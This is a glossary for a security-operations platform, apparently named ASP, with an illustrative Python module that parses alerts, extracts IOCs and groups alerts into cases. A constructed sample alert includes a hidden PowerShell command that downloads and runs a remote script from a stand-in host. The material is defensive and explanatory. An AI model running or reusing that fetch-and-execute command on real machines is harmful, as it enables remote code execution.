Glossary
| Term | Meaning |
|---|---|
| Case | A security case: the primary object for managing and tracking an incident through the handling process. It carries status, severity, priority, disposition, assignee, summary, the AI investigation report, the discussion thread, and any associated Playbook runs. |
| Alert | A single alert, typically from a SIEM, EDR, cloud platform, or Webhook. An Alert is attached to a Case and preserves its original context (triggering rule, product, MITRE ATT&CK mapping, raw log). Analysts investigate starting from alerts but do not normally edit alert data, so the Alert remains an unmodified record of what was received. |
| Artifact | An entity, piece of evidence, or IOC related to an incident: an IP address, domain, URL, file hash, account, host, process, and so on. Queries, response actions, and enrichment revolve around Artifacts. |
| Enrichment | External context recorded against an Artifact: threat intelligence, reputation, asset and identity information, historical sightings, and response recommendations. |
| Knowledge | Reusable security knowledge for the SOC team. It can be maintained manually or extracted from the investigation records and discussions of closed Cases, and can be consulted by the AI Agent. |
| Playbook | A record of an automation task. Currently triggered from a Case; it records the playbook name, User Input, execution status, and background task ID. Common statuses are Pending, Running, Success, and Failed. |
| Investigation Report | A structured report produced by AI analysis, typically covering disposition, attack chain, IOCs, impact, and remediation recommendations. |
| Raw Log | The original log content of an Alert, typically stored as JSON. Used to trace an alert back to its source and recover its full context. |
| Unmapped Data | Fields in the raw alert that were not mapped to standard fields. The original information is preserved, but it is not normally the focus of default AI analysis. |
| Module | A Python script that processes alerts as a stream. A Module extracts fields and IOCs from alert messages, performs correlation and aggregation, and creates or updates Cases, Alerts, and Artifacts. |
| User Input | Free-text supplementary requirements a user supplies when running a Playbook; the LLM or automation task refers to them during execution. |
| Inbox | In-app messages from the system or from other users. A message can reference resources and carry attachments. |
| Audit Log | Records the creation, update, and deletion of resources, including the fields that changed and the operator who made the change. |
| LLM Provider | A large-model configuration entry: name, Base URL, model, API Key, proxy, tags, and priority. |
| Runtime | Agentic runtime configuration; currently includes prompt language and stream length. Defaults: Prompt Language en, Stream Maxlen 10000. |
| Harness Agent | An agent that reaches ASP capabilities through plugins and MCP. It can work with Cases, Artifacts, SIEM logs, threat intelligence, Modules, and Playbooks. |
| Webhook | The entry point through which an external SIEM or alerting system sends alerts into ASP; for example, Splunk or Kibana alerts can enter the platform through a Webhook. |
| ELK Index Action | An ingestion path in which Kibana first writes actions to an Elasticsearch index, and an ASP worker then polls that index and converts the documents into alerts. |
| SIEM YAML | A YAML configuration describing Splunk / ELK indexes, their fields, and default aggregation fields, so that the Agent / MCP can understand and query the logs. |
| Personal Center | Where the current user maintains their profile, personal settings, password, and API Key. |
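The Raw Log, Unmapped Data, Module, and Artifact entries describe one pipeline: a Module reads a raw alert, maps the fields it understands, keeps the rest as unmapped data, carves IOCs out of the text, and aggregates related alerts into a Case. The following is an added example of that pipeline written for this glossary; it is not ASP's own Module API. The field map, the host-plus-rule correlation key, the IOC regexes, and the two sample alerts are all constructed assumptions chosen to show the mechanics.

```python
"""Illustrative alert-processing Module (added example, not ASP code).

Assumptions: FIELD_MAP, the Case/Alert/Artifact shapes, the correlation key
and the sample alerts below are invented for illustration.
"""
import json
import re
from dataclasses import dataclass, field

# Standard fields and the raw keys each may be read from (assumed mapping).
FIELD_MAP = {
    "rule": ["rule_name", "signal.rule.name"],
    "product": ["product", "observer.product"],
    "host": ["host", "host.name"],
    "user": ["user", "user.name"],
    "mitre": ["mitre_technique", "threat.technique.id"],
}

# Regexes used to carve IOCs out of string values. Raw alert text is
# untrusted input, so it is only pattern-matched, never interpreted.
IOC_PATTERNS = {
    "url": re.compile(r"""\bhttps?://[^\s"'<>()]+""", re.I),
    "sha256": re.compile(r"\b[A-Fa-f0-9]{64}\b"),
    "ipv4": re.compile(
        r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"),
    # Deliberately small TLD list so hostnames like powershell.exe are ignored.
    "domain": re.compile(r"\b(?:[a-z0-9-]+\.)+(?:com|net|org|io|info|xyz)\b", re.I),
}


@dataclass
class Alert:
    fields: dict      # standard fields (None when the raw alert lacked one)
    unmapped: dict    # Unmapped Data: raw keys no mapping consumed
    raw_log: str      # Raw Log, kept verbatim as JSON


@dataclass
class Artifact:
    type: str
    value: str
    sightings: int = 0  # number of alerts in the Case that contained it


@dataclass
class Case:
    key: str
    alerts: list = field(default_factory=list)
    artifacts: dict = field(default_factory=dict)  # (type, value) -> Artifact


def get_path(obj, dotted):
    """Resolve a dotted path such as 'signal.rule.name' in nested dicts."""
    cur = obj
    for part in dotted.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return None
        cur = cur[part]
    return cur


def iter_strings(obj):
    """Yield every string value anywhere inside a JSON-like structure."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for v in obj.values():
            yield from iter_strings(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from iter_strings(v)


def extract_iocs(text):
    """Return (type, value) pairs found in text. URLs are removed before the
    domain pass so a URL's hostname is not reported a second time."""
    found = [("url", m.group(0)) for m in IOC_PATTERNS["url"].finditer(text)]
    rest = IOC_PATTERNS["url"].sub(" ", text)
    for kind in ("sha256", "ipv4", "domain"):
        for m in IOC_PATTERNS[kind].finditer(rest):
            value = m.group(0) if kind == "ipv4" else m.group(0).lower()
            found.append((kind, value))
    return found


def process_alert(raw, cases):
    """Map fields, keep unmapped data, extract IOCs, and aggregate into a Case."""
    fields, consumed = {}, set()
    for std, candidates in FIELD_MAP.items():
        fields[std] = None
        for path in candidates:
            val = get_path(raw, path)
            if val is not None:
                fields[std] = val
                consumed.add(path.split(".")[0])  # whole top-level subtree counts as mapped
                break
    unmapped = {k: v for k, v in raw.items() if k not in consumed}
    alert = Alert(fields, unmapped, json.dumps(raw, sort_keys=True))

    # Assumed correlation key: same host and same rule -> same Case.
    key = f"{fields['host'] or 'unknown'}|{fields['rule'] or 'unknown'}"
    case = cases.setdefault(key, Case(key=key))
    case.alerts.append(alert)

    iocs = set()  # dedupe within one alert so sightings count alerts, not mentions
    for text in iter_strings(raw):
        iocs.update(extract_iocs(text))
    for kind, value in iocs:
        case.artifacts.setdefault((kind, value), Artifact(kind, value)).sightings += 1
    return case


def process_all(raw_alerts):
    cases = {}
    for raw in raw_alerts:
        process_alert(raw, cases)
    return cases


# Constructed sample alerts: two alerts from one host, one rule, one campaign.
SAMPLE_ALERTS = [
    {
        "rule_name": "Suspicious PowerShell download",
        "product": "EDR-X",
        "host": "WS-0142",
        "user": "jdoe",
        "mitre_technique": "T1059.001",
        "process": {
            "cmdline": "powershell -nop -w hidden IEX (iwr http://evil.example.com/p.ps1)",
            "sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
        },
        "vendor_extra": {"sensor_id": 42},
    },
    {
        "rule_name": "Suspicious PowerShell download",
        "host": "WS-0142",
        "dest_ip": "203.0.113.45",
        "message": "Outbound connection to 203.0.113.45 by powershell.exe",
    },
]

if __name__ == "__main__":
    for case in process_all(SAMPLE_ALERTS).values():
        print(case.key, len(case.alerts), "alerts", sorted(case.artifacts))
```

Two points worth noting for a real Module. The correlation key is built from values the alert producer controls, so a host whose name an attacker can influence can split or merge Cases; the key should come from fields the sensor asserts, not from free text. And the unmapped dictionary is kept so nothing from the raw alert is lost, which is what lets an analyst (or a later enrichment) go back to data the default analysis ignored.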